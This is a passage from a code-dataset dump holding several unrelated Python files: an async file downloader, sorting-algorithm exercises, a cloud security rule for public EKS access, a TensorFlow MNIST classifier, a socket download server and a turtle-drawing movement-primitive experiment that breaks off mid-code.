print(self.api_name, self.currency_symbol, 'price_eth ', repr(self.price_eth))\n print(self.api_name, self.currency_symbol, 'price_usd ', repr(self.price_usd))\n print(self.api_name, self.currency_symbol, 'price_btc ', repr(self.price_btc))\n print(self.api_name, self.currency_symbol, 'volume_usd ', repr(self.volume_usd))\n print(self.api_name, self.currency_symbol, 'volume_eth ', repr(self.volume_eth))\n print(self.api_name, self.currency_symbol, 'volume_btc ', repr(self.volume_btc))\n print(self.api_name, self.currency_symbol, 'change_24h ', repr(self.change_24h))\n print(self.api_name, self.currency_symbol, 'eth_price_usd', repr(self.eth_price_usd))\n print(self.api_name, self.currency_symbol, 'btc_price_usd', repr(self.btc_price_usd))\n\nif __name__ == \"__main__\":\n\n btc_api = EthexAPI('DAI')\n btc_api.update()\n btc_api.print_all_values()\n\n oxbtc_api = EthexAPI('0xBTC')\n oxbtc_api.update()\n oxbtc_api.print_all_values()\n","sub_path":"ethex.py","file_name":"ethex.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"257306999","text":"import asyncio\nimport aiohttp\nimport uuid\nimport tqdm\nimport os\n\n\n\nclass AsyncDownload(object):\n def __init__(self, \n path=\"\", \n overwrite=False,\n files_list=[],\n sem=30, \n tcp_limit=100, \n show_progress=True, \n *args, **kwargs):\n\n if path == \"\":\n raise Exception(\"Download destination path must be set\")\n self.path = path\n os.makedirs(path, exist_ok=True)\n 
self.overwrite = overwrite\n self.semaphore = asyncio.Semaphore(sem)\n self.conn = aiohttp.TCPConnector(limit=tcp_limit, verify_ssl=False)\n self.show_progress = show_progress\n self.files_list = files_list\n super().__init__()\n \n\n async def extract_filename_extension(self, file_url):\n relative_path, filename = os.path.split(file_url)\n basename, extension = os.path.splitext(filename)\n return basename, extension\n \n async def file_download(self, session, obj):\n async with self.semaphore:\n url = obj.url\n path = self.path\n overwrite = self.overwrite\n basename, extension = await self.extract_filename_extension(obj.key)\n new_filename = \"{db_id}{ext}\".format(db_id=obj.db_id, ext=extension)\n final_path = os.path.join(path, new_filename)\n doesnt_exist = not os.path.exists(final_path)\n if overwrite == True or doesnt_exist == True:\n async with session.get(url) as response:\n status = response.status\n if status in range(200, 299):\n body = await response.read()\n with open(final_path, \"wb\") as f:\n f.write(body)\n return response\n else:\n return\n\n async def progress(self, tasks):\n if self.show_progress:\n responses = [await f for f in tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))]\n return responses\n return [await f for f in tasks] #tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))]\n \n async def client_run(self):\n files_list = self.files_list\n conn = self.conn\n async with aiohttp.ClientSession(connector=conn) as session:\n tasks = []\n for obj in files_list:\n tasks.append(self.file_download(session, obj))\n responses = await self.progress(tasks) #[await f for f in tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))]\n\n\n def run(self):\n loop = asyncio.get_event_loop()\n tasks = [asyncio.ensure_future(self.client_run())]\n try:\n loop.run_until_complete(asyncio.wait(tasks))\n except RuntimeError:\n pass\n\n\n\nasync_download = AsyncDownload\n\n","sub_path":"tightai/async_utils.py","file_name":"async_utils.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457054926","text":"'''\ndeques “are a generalization of stacks and queues”.\n'''\n'''\ndeque with maxlen: When a bounded deque is full, any new items added will cause the same number of items to be popped off the other end.\n'''\nfrom collections import deque\nimport string\nd = deque(string.ascii_lowercase)\nfor letter in d:\n print(letter)\n\n'''\nappend/appendleft\nrotate(1)\n'''\nd.append('bork')\nprint (d)\n#deque(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n# 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'bork'])\n\nd.appendleft('test')\nprint (d)\n#deque(['test', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n# 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'bork'])\n\nd.rotate(1)\nprint (d)\n#deque(['bork', 'test', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\n# 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'])\n\n'''\nSimilar to 'tail' program\n'''\nfrom collections import deque\n\n\ndef get_last(filename, n=5):\n \"\"\"\n Returns the last n lines from the file\n \"\"\"\n try:\n with open(filename) as f:\n return deque(f, n)\n except OSError:\n print(\"Error opening file: {}\".format(filename))\n raise\n ","sub_path":"Leetcode_Practice/Python 
Advanced/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234083893","text":"from flask_mysqldb import MySQL\n\nmysql = MySQL()\n\nresponses_codes = [\n {\"code\": 0, \"response\": \"OK\"},\n {\"code\": 1, \"response\": \"Requested object is not found\"},\n {\"code\": 2, \"response\": \"Invalid request\"},\n {\"code\": 3, \"response\": \"Incorrect request(semantically)\"},\n {\"code\": 4, \"response\": \"Undefined error\"},\n {\"code\": 5, \"response\": \"User/Forum is already exists\"}\n]\n","sub_path":"extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523380518","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport pytumblr\nimport logging\n\nimport nygithub\nimport nyconfig\n\n# Authenticate via OAuth\nclient = pytumblr.TumblrRestClient(\n nyconfig.consumer_key(),\n nyconfig.consumer_secret(),\n nyconfig.oauth_token(),\n nyconfig.oauth_secret()\n)\n\ndef message(accroche,titre,msg):\n client.create_text(nyconfig.tumblr_account(), state=\"published\", slug=accroche, title=titre, body=msg)\n\ndef snapshot(msg,chemin):\n client.create_photo(nyconfig.tumblr_account(), state=\"published\", tags=[\"test\", \"photo\"], tweet=msg, data=chemin)\n\ndef upload_csv_link(jour,taille):\n logging.debug(\"Upload CSV\")\n client.create_link(nyconfig.tumblr_account(), title=\"Données du nichoir pour le %s\" % jour, url=\"https://raw.githubusercontent.com/JulienPobot/NichoirConnecte/master/csv/%s.csv\" % jour, description=\"Le fichier de %s octets est disponible contenant toutes les valeurs recueillies depuis 24h.\" % taille)\n\n","sub_path":"src/lecube/nichoir/nytumblr.py","file_name":"nytumblr.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533701648","text":"'''\r\nCreated on May 1, 2017\r\n\r\n@author: Alex.Wang\r\n'''\r\n'''\r\nCase: sort [E,X,A,M,P,L,E] in alphabetical order\r\n 1, implements selection sort \r\n 2, implements bubble sort \r\n 3, implements insertion sort \r\n 4, implements merge sort \r\n 5, implements quick sort and draw the tree of the recursive calls made\r\n 6, implements shell sort \r\n'''\r\noriginal = ['E','X','A','M','P','L','E']\r\n\r\ndef selectionsort(target, length):\r\n '''\r\n SELECTION-SORT(A)\r\n for j ← 1 to n-1\r\n smallest ← j\r\n for i ← j + 1 to n\r\n if A[ i ] < A[ smallest ]\r\n smallest ← i\r\n Exchange A[ j ] ↔ A[ smallest ]\r\n '''\r\n for i in range(length):\r\n s = i\r\n for j in range(i + 1, length):\r\n if target[j] < target[s]:\r\n s = j\r\n target[i], target[s] = target[s], target[i]\r\n return target\r\n\r\ndef bubblesort(target, length):\r\n '''\r\n func bubblesort( var a as array )\r\n for i from 1 to N\r\n for j from 0 to N - 1\r\n if a[j] > a[j + 1]\r\n swap( a[j], a[j + 1] )\r\n end func\r\n '''\r\n for i in range(length): # @UnusedVariable\r\n for j in range(0, length - 1):\r\n if target[j] > target[j + 1]:\r\n target[j], target[j + 1] = target[j + 1], target[j]\r\n return target\r\n\r\ndef insertsort(target, length):\r\n '''\r\n procedure insertionSort( A : array of items )\r\n int holePosition\r\n int valueToInsert\r\n for i = 1 to length(A) inclusive do:\r\n /* select value to be inserted */\r\n valueToInsert = A[i]\r\n holePosition = i\r\n /*locate hole position for 
the element to be inserted */\r\n while holePosition > 0 and A[holePosition-1] > valueToInsert do:\r\n A[holePosition] = A[holePosition-1]\r\n holePosition = holePosition -1\r\n end while\r\n /* insert the number at hole position */\r\n A[holePosition] = valueToInsert\r\n end for\r\n end procedure\r\n '''\r\n for i in range(1, length):\r\n v = target[i]\r\n p = i\r\n while p > 0 and target[p - 1] > v:\r\n target[p] = target[p - 1]\r\n p = p - 1\r\n target[p] = v\r\n return target\r\n\r\ndef mergesort(target):\r\n '''\r\n procedure mergesort( var a as array )\r\n if ( n == 1 ) return a\r\n var l1 as array = a[0] ... a[n/2]\r\n var l2 as array = a[n/2+1] ... a[n]\r\n\r\n l1 = mergesort( l1 )\r\n l2 = mergesort( l2 )\r\n return merge( l1, l2 )\r\n end procedure\r\n\r\n procedure merge( var a as array, var b as array )\r\n var c as array\r\n while ( a and b have elements )\r\n if ( a[0] > b[0] )\r\n add b[0] to the end of c\r\n remove b[0] from b\r\n else\r\n add a[0] to the end of c\r\n remove a[0] from a\r\n end if\r\n end while\r\n \r\n while ( a has elements )\r\n add a[0] to the end of c\r\n remove a[0] from a\r\n end while\r\n \r\n while ( b has elements )\r\n add b[0] to the end of c\r\n remove b[0] from b\r\n end while\r\n return c\r\n end procedure\r\n '''\r\n if len(target) == 0 or len(target) == 1:\r\n return target\r\n else:\r\n mid = round(len(target) / 2)\r\n l1 = mergesort(target[:mid])\r\n l2 = mergesort(target[mid:])\r\n \r\n return merge(l1, l2)\r\n\r\ndef merge(l1, l2):\r\n r = []\r\n while len(l1) != 0 and len(l2) != 0:\r\n if l1[0] < l2[0]:\r\n r.append(l1[0])\r\n l1.remove(l1[0])\r\n else:\r\n r.append(l2[0])\r\n l2.remove(l2[0])\r\n if len(l1) == 0:\r\n r.extend(l2)\r\n else:\r\n r.extend(l1)\r\n return r\r\n \r\n\r\ndef quciksort(target, left, right):\r\n '''\r\n Step 1 − Choose the highest index value has pivot\r\n Step 2 − Take two variables to point left and right of the list excluding pivot\r\n Step 3 − left points to the low index\r\n Step 4 − right points to the high\r\n Step 5 − while value at left is less than pivot move right\r\n Step 6 − while value at right is greater than pivot move left\r\n Step 7 − if both step 5 and step 6 does not match swap left and right\r\n Step 8 − if left ≥ right, the point where they met is new pivot\r\n \r\n function partitionFunc(left, right, pivot)\r\n leftPointer = left\r\n rightPointer = right - 1\r\n\r\n while True do\r\n while A[++leftPointer] < pivot do\r\n //do-nothing \r\n end while\r\n \r\n while rightPointer > 0 && A[--rightPointer] > pivot do\r\n //do-nothing \r\n end while\r\n \r\n if leftPointer >= rightPointer\r\n break\r\n else \r\n swap leftPointer,rightPointer\r\n end if\r\n end while \r\n swap leftPointer,right\r\n return leftPointer\r\n end function\r\n \r\n Step 1 − Make the right-most index value pivot\r\n Step 2 − partition the array using pivot value\r\n Step 3 − quicksort left partition recursively\r\n Step 4 − quicksort right partition recursively\r\n\r\n procedure quickSort(left, right)\r\n if right-left <= 0\r\n return\r\n else \r\n pivot = A[right]\r\n partition = partitionFunc(left, right, pivot)\r\n quickSort(left,partition-1)\r\n quickSort(partition+1,right) \r\n end if \r\n end procedure\r\n '''\r\n if right - left <= 0:\r\n return target\r\n else:\r\n pivot = partitionFunc(target, left, right)\r\n quciksort(target, left, pivot - 1)\r\n quciksort(target, pivot + 1, right)\r\n return target\r\n\r\n\r\ndef partitionFunc(target, left, right):\r\n pivot = target[left]\r\n\r\n while left < right:\r\n 
while left < right and target[right] >= pivot:\r\n right -= 1\r\n target[left] = target[right] \r\n \r\n while left < right and target[left] <= pivot:\r\n left += 1\r\n target[right] = target[left] \r\n \r\n target[left] = pivot\r\n return left\r\n\r\ndef shellsort(target, length):\r\n '''\r\n Step 1 − Initialize the value of h\r\n Step 2 − Divide the list into smaller sub-list of equal interval h\r\n Step 3 − Sort these sub-lists using insertion sort\r\n Step 3 − Repeat until complete list is sorted\r\n \r\n procedure shellSort()\r\n A : array of items \r\n /* calculate interval*/\r\n while interval < A.length /3 do:\r\n interval = interval * 3 + 1 \r\n end while\r\n \r\n while interval > 0 do:\r\n for outer = interval; outer < A.length; outer ++ do:\r\n /* select value to be inserted */\r\n valueToInsert = A[outer]\r\n inner = outer;\r\n\r\n /*shift element towards right*/\r\n while inner > interval -1 && A[inner - interval] >= valueToInsert do:\r\n A[inner] = A[inner - interval]\r\n inner = inner - interval\r\n end while\r\n\r\n /* insert the number at hole position */\r\n A[inner] = valueToInsert\r\n end for\r\n\r\n /* calculate interval*/\r\n interval = (interval -1) /3; \r\n end while\r\n end procedure\r\n '''\r\n interval = 0\r\n while interval < length / 3:\r\n interval = interval * 3 + 1 \r\n \r\n while interval > 0:\r\n for outer in range(interval, length):\r\n valueToInsert = target[outer]\r\n inner = outer\r\n\r\n while inner > interval - 1 and target[inner - interval] >= valueToInsert:\r\n target[inner] = target[inner - interval]\r\n inner = inner - interval\r\n\r\n target[inner] = valueToInsert\r\n\r\n interval = int((interval - 1) / 3) \r\n return target\r\n\r\ndef output():\r\n length = len(original)\r\n \r\n print(selectionsort(original[:], length))\r\n \r\n print(bubblesort(original[:], length))\r\n \r\n print(insertsort(original[:], length))\r\n \r\n print(mergesort(original[:]))\r\n \r\n print(quciksort(original[:], 0, length - 1))\r\n \r\n print(shellsort(original[:], length))\r\n \r\noutput()\r\n\r\n\r\n ","sub_path":"2801ICT_Computing_Algorithms/exam_2/sorts_practice.py","file_name":"sorts_practice.py","file_ext":"py","file_size_in_byte":8370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368679570","text":"from typing import List, Dict\n\nfrom cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule\nfrom cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext\nfrom cloudrail.knowledge.rules.base_rule import Issue\nfrom cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType\n\n\nclass PublicAccessEksApiRule(AwsBaseRule):\n\n def get_id(self) -> str:\n return 'public_access_eks_api'\n\n def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]:\n issues: List[Issue] = []\n for eks_cluster in env_context.eks_clusters:\n violating_security_group = eks_cluster.security_group_allowing_public_access\n if violating_security_group:\n issues.append(Issue(\n f'~Internet~. '\n f'{eks_cluster.get_type()} `{eks_cluster.get_friendly_name()}` '\n f'is on {eks_cluster.network_resource.vpc.get_type()}'\n f' `{eks_cluster.network_resource.vpc.get_friendly_name()}`. '\n f'Master is protected by security groups '\n f'`{\", \".join([x.get_friendly_name() for x in eks_cluster.network_resource.security_groups])}`. 
'\n f'{eks_cluster.get_type()} uses subnets'\n f' `{\", \".join([x.get_friendly_name() for x in eks_cluster.network_resource.subnets])}`. '\n f\"Subnets rely on Network ACL's \"\n f'`{\", \".join([x.network_acl.get_friendly_name() for x in eks_cluster.network_resource.subnets])}`. '\n f'They also rely on Route tables '\n f'`{\", \".join([x.route_table.get_friendly_name() for x in eks_cluster.network_resource.subnets])}`. '\n f'{eks_cluster.get_type()} is set to be publicly accessible',\n eks_cluster,\n violating_security_group))\n\n return issues\n\n def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool:\n return bool(environment_context.eks_clusters)\n","sub_path":"cloudrail/knowledge/rules/aws/context_aware/public_access_validation_rules/public_access_eks_api_rule.py","file_name":"public_access_eks_api_rule.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422066020","text":"#!/usr/bin/env python3\nfrom socket import *\n#import os\n\nPOST = 9527\nHOST = ''\nBUFSIZE = 1024\n\ndef main():\n #创建socket\n downLoad_ser = socket(AF_INET,SOCK_STREAM)\n #绑定端口bind\n downLoad_ser.bind((HOST,POST))\n #被动接收 listen\n downLoad_ser.listen(128)\n while True:\n #等待客户端连接accept\n downLoad_cli,downLoad_addr = downLoad_ser.accept()\n print('下载客户端的地址是:%s' % str(downLoad_addr))\n \n while True:\n #接收/发送数据 recv/send\n downLoad_file = downLoad_cli.recv(BUFSIZE)\n \n if not downLoad_file:\n print(\"客户端断开连接\")\n downLoad_cli.close()\n break\n else:\n try:\n f = open('downLoad_file.decode()','rb')\n downLoad_file_data = f.read()\n f.close()\n except:\n print(\"%s 文件不存在!\" % downLoad_file.decode())\n downLoad_cli.send(downLoad_file_data)\n #关闭连接close\n downLoad_ser.close()\nif __name__ == \"__main__\":\n main()\n","sub_path":"Socket/downLoad-server.py","file_name":"downLoad-server.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"284229407","text":"# coding=utf-8\n# __project__ = \"使用cnn训练mnist数据集进行分类\"\n# __author__ = \"Nicksphere\"\n# __time__ = \"2018/4/23 下午5:24\"\n\nimport tensorflow as tf\n\nfrom deeplearning import input_data\n\n\n# 构造tensor训练图\ndef train():\n # 28*28=784灰度图的二维像素表示\n x = tf.placeholder(\"float\", [None, 784])\n # w表示每个类别的权重\n W = tf.Variable(tf.zeros([784, 10]))\n # b表示偏置量\n b = tf.Variable(tf.zeros([10]))\n # 载入minist图像数据,60000行训练集mnist.train和10000行的测试数据集mnist.test\n mnist = input_data.read_data_sets('data/', one_hot=True)\n # 最小化交叉熵训练模型,采用梯度下降法\n y_ = tf.placeholder(\"float\", [None, 10])\n sess = tf.InteractiveSession()\n\n # 权重初始化函数\n def weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n def bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n # 卷积和池化\n def conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n def max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n def variable_summaries(var):\n with tf.name_scope(\"summaries\"):\n mean = tf.reduce_mean(var)\n tf.summary.scalar(\"mean\", mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var-mean)))\n tf.summary.scalar(\"stdevv\", stddev)\n tf.summary.scalar(\"max\", tf.reduce_max(var))\n tf.summary.histogram(\"histogram\", var)\n\n # 第一层卷积\n with tf.name_scope(\"layer1\"):\n w_conv1 = weight_variable([5, 
5, 1, 32])\n variable_summaries(w_conv1)\n b_conv1 = bias_variable([32])\n variable_summaries(b_conv1)\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n # 使用relu激活函数\n h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1)+b_conv1)\n # Maxpool的方式池化\n h_pool1 = max_pool_2x2(h_conv1)\n # 第二层卷积\n with tf.name_scope(\"layer2\"):\n w_conv2 = weight_variable([5, 5,32,64])\n variable_summaries(w_conv2)\n b_conv2 = bias_variable([64])\n variable_summaries(b_conv2)\n h_conv2 = tf.nn.relu(conv2d(h_pool1,w_conv2)+ b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n # 神经网络全连接层\n with tf.name_scope(\"full_layer\"):\n w_fc1 = weight_variable([7*7*64, 1024])\n variable_summaries(w_fc1)\n b_fc1 = bias_variable([1024])\n variable_summaries(b_fc1)\n h_pool_flat = tf.reshape(h_pool2,[-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool_flat, w_fc1) + b_fc1)\n variable_summaries(h_fc1)\n\n # dropuout层\n with tf.name_scope(\"dropout\"):\n keep_prob = tf.placeholder(\"float\")\n h_fc1_dropout = tf.nn.dropout(h_fc1, keep_prob)\n variable_summaries(h_fc1_dropout)\n # softmax分类输出层\n with tf.name_scope(\"softmax\"):\n w_fc2 = weight_variable([1024, 10])\n variable_summaries(w_fc2)\n b_fc2 = bias_variable([10])\n variable_summaries(b_fc2)\n y_conv = tf.nn.softmax(tf.matmul(h_fc1_dropout, w_fc2) + b_fc2)\n\n cross_entroy = -tf.reduce_sum(y_* tf.log(y_conv))\n variable_summaries(cross_entroy)\n # 选择梯度下降法训练\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entroy)\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n variable_summaries(accuracy)\n sess.run(tf.initialize_all_variables())\n\n # 记录\n merged = tf.summary.merge_all()\n log_dir = \"/tmp/tensor/mnist\"\n if tf.gfile.Exists(log_dir):\n tf.gfile.DeleteRecursively(log_dir)\n tf.gfile.MakeDirs(log_dir)\n train_writer = tf.summary.FileWriter('/tmp/tensor/mnist',sess.graph)\n tf.global_variables_initializer().run()\n\n for i in range(10000):\n batch = mnist.train.next_batch(50)\n if i % 100 == 0:\n train_accuracy = accuracy.eval(\n feed_dict={x:batch[0], y_:batch[1], keep_prob:0.5}\n )\n print(\"step %d,trainning accuracy %g\", i, train_accuracy)\n # train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n summary, _ = sess.run([merged, train_step], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n train_writer.add_summary(summary, i)\n print(\"test accuracy %g\", accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n\nif __name__ == \"__main__\":\n # print(1)\n train()\n # tf.app.run(main=main)","sub_path":"src/deeplearning/mnistcnn.py","file_name":"mnistcnn.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157419620","text":"import flask, foobar, multiprocessing, pytest, requests\n\n\n'''\nserver_process = None\ndef setup_module(module):\n global server_process\n server_process = multiprocessing.Process(target=foobar.run_server)\n server_process.start()\n\ndef teardown_module(module):\n server_process.terminate()\n\n@pytest.fixture\ndef server(request):\n server_process = multiprocessing.Process(target=foobar.run_server)\n server_process.start()\n def teardown():\n server_process.terminate()\n request.addfinalizer(teardown)\n'''\n\nhost = 'localhost'\nport = 8000\nurl = 'http://{}:{}/{{}}'.format(host, port)\n\ndef _test_foo():\n response = requests.get(url.format('foo'))\n assert response.status_code == 200\n assert 
response.content.decode() == 'foo'\n\ndef _test_bar():\n response = requests.get(url.format('bar'))\n assert response.status_code == 200\n assert response.content.decode() == 'bar'\n","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372844036","text":"import numpy as np\nimport math as m\nimport copy\nfrom array import array\nimport matplotlib.pyplot as plot\nfrom sklearn.linear_model import Ridge\nimport cma\nimport turtle\nfrom turtle import*\n\n\n################################################################################################################\n # Turtle Implementation #\n ############################################\n\nLOOP_THRESHOLD = 20\n# Create screen and turtle variables\nout_screen = Screen()\nmy_turtle = Turtle(\"turtle\")\nmy_turtle.speed(-1)\n\n# Create two lists to store X and Y coordinates\nx_coords = []\ny_coords = []\n\n# Draw function\ndef turtle_draw(x, y):\n my_turtle.ondrag(None)\n my_turtle.setheading(my_turtle.towards(x, y))\n my_turtle.goto(x, y)\n my_turtle.ondrag(turtle_draw)\n\n # Ensure 0 is always positive\n if(x == -0.0):\n x = 0.0\n\n # Append the x coordinate to the end of the list\n x_coords.append(x)\n\n # Ensure 0 is always positive\n if(y == -0.0):\n y = 0.0\n\n # Append the y coordinate to the end of the list\n y_coords.append(y)\n\n # End drawing session after a certain threshold is reached\n if(len(x_coords) >= LOOP_THRESHOLD):\n turtle.bye()\n\n# The main function\ndef test_turtle():\n turtle.listen()\n\n my_turtle.ondrag(turtle_draw)\n\n out_screen.mainloop()\n\ntest_turtle()\n\n#################################################################################################################################\n # Implementatio of DMP #\n ############################################\nclass DMP(object):\n\n def __init__(self,w,x_asis_of_turtle,y_asis_for_turtle, pastor_mod = False):\n####################################################\n # Data Collection #\n ############################################\n self.pastor_mod = pastor_mod\n #initial values\n self.x0 = 0 #initial position\n self.goal = 20 #goal position\n self.step = 0.1 #The amount of steps in taken in a particular time frame\n\n####################################################\n # Turtle function Implementation #\n ############################################\n #for x in range(len(step)):\n #position\n self.k = 100\n self.d = 2.0 * np.sqrt(self.k)\n self.w = w\n\n self.x_asis_for_turtle = x_coords\n self.y_asis_for_turtle = y_coords\n\n #converges_for_sin\n self.start = self.d / 3 # where it starts converges_for_sin to 0 but won't equal 0\n self.l = 1000.0\n self.b = 20.0 / np.pi\n\n\n#########################################################################################################################################################\n # Implimentation DMP Learning For Turtle Functions #\n ###########################################################\n\n def spring_damping_for_sin(self):\n\n #Think of it as the slope of the function as it goes through\n\n return self.k * (self.y_asis_for_turtle) - self.k * (self.x0) * self.s + self.k\n\n def converges_for_sin(self):\n\n phases = np.exp(-self.start * (((np.linspace(0, 1, len(self.x_asis_of_turtle))))))\n #print(phases)\n return phases #it displays the exponential converges_for_sin\n\n def duplicate_for_sin(self):\n\n #Vertically stack the array with y coordinates and x 
coordinates divided by the ammount of steps in secs\n original_matrix_1 = np.vstack((np.zeros([1, (self.goal)], dtype = int), (self.y_asis_for_turtle)))\n original_matrix_2 = np.vstack((np.zeros([1, self.goal], dtype = int), original_matrix_1))\n\n F = self.step * self.step * original_matrix_1 - self.d * (self.k * (original_matrix_1 ) - self.step * original_matrix_1)\n temp = np.zeros([20, (self.goal)], dtype = int)\n\n temp[:F.shape[0],:F.shape[1]] = F\n design = np.array([self._features_for_sin() for self.s in self.converges_for_sin()])\n #print(design)\n lr = Ridge(alpha=1.0, fit_intercept=False)\n lr.fit(design, temp)\n self.w = lr.coef_\n\n\n #Think of it as the x-asis of the duplicate_for_sin\n return self.w\n\n def shape_path_for_sin(self, scale=False):\n\n #creating a 2d vector base on the duplicate_for_sin\n f = np.dot(self.w, self._features_for_sin())\n\n return f\n\n def reproduction_for_sin(self, o = None, shape = True, avoidance=False, verbose=0):\n\n #if verbose <= 1:\n #print(\"Trajectory with x0 = %s, g = %s, self.step=%.2f, step=%.3f\" % (self.x0, self.goal, self.step, self.step))\n\n #puts evething that was from X to x; from array to matrix\n x = copy.copy(self.y_asis_for_turtle)\n temp_matrix_of_x1 = copy.copy(x)\n temp_matrix_of_x2 = copy.copy(x)\n\n original_matrix_1 = [copy.copy(temp_matrix_of_x1)]\n original_matrix_2 = [copy.copy(temp_matrix_of_x2)]\n\n #reproducing the x-asis\n t = 0.1 * self.step\n ti = 0\n\n S = self.converges_for_sin()\n while t < self.step:\n t += self.step\n ti += 1\n self.s = S[ti]\n\n #x += temp_matrix_of_x1\n temp_matrix_of_x1 += temp_matrix_of_x2\n\n sd = self.spring_damping_for_sin()\n # the weighted shape base on the movement\n f = self.shape_path_for_sin() if shape else 0.\n C = self.step.obstacle_for_sin(o, x, temp_matrix_of_x1) if avoidance else 0.0\n\n #print(temp_matrix_of_x2)\n\n #Everything that you implemented in the matrix that was temperary will initialize will be put into the none temperary matrix\n if ti % self.step > 0:\n temp_matrix_of_x1 = np.append(copy.copy(x),copy.copy(self.y_asis_for_turtle))\n original_matrix_1 = np.append(copy.copy(self.y_asis_for_turtle),copy.copy(temp_matrix_of_x1))\n original_matrix_2 = np.append(copy.copy(self.y_asis_for_turtle),copy.copy(temp_matrix_of_x2))\n\n self.BlackBox = cma.fmin(cma.ff.linear,self.y_asis_for_turtle,1)\n\n\n print(self.BlackBox[0])\n #for i in range(len(self.BlackBox[0])):\n\n #original_matrix_1[i] *= self.BlackBox[0][i]\n\n temp = np.array(self.y_asis_for_turtle)\n\n #return the matrix as array when returning\n original_matrix_1 = temp * (self.BlackBox[2] / 500)\n\n #return the matrix as array when returning\n return np.array(self.y_asis_for_turtle), np.array(x), np.array(original_matrix_1)\n\n\n def obstacle_for_sin(self, o, original_matrix_1):\n\n if self.y_asis_for_turtle.ndim == 1:\n self.y_asis_for_turtle = self.y_asis_for_turtle[np.newaxis, np.newaxis, :]\n if original_matrix_1.ndim == 1:\n original_matrix_1 = original_matrix_1[np.newaxis, np.newaxis, :]\n\n C = np.zeros_like(self.y_asis_for_turtle)\n R = np.array([[np.cos(np.pi / 2.0), -np.sin(np.pi / 2.0)],\n [np.sin(np.pi / 2.0), np.cos(np.pi / 2.0)]])\n\n for i in xrange(self.y_asis_for_turtle.shape[0]):\n for j in xrange(self.y_asis_for_turtle.shape[1]):\n obstacle_diff = o - self.y_asis_for_turtle[i, j]\n theta = (np.arccos(obstacle_diff.dot(original_matrix_1[i, j]) / (np.linalg.norm(obstacle_diff) * np.linalg.norm(original_matrix_1[i, j]) + 1e-10)))\n C[i, j] = (self.l * R.dot(original_matrix_1[i, j]) * theta 
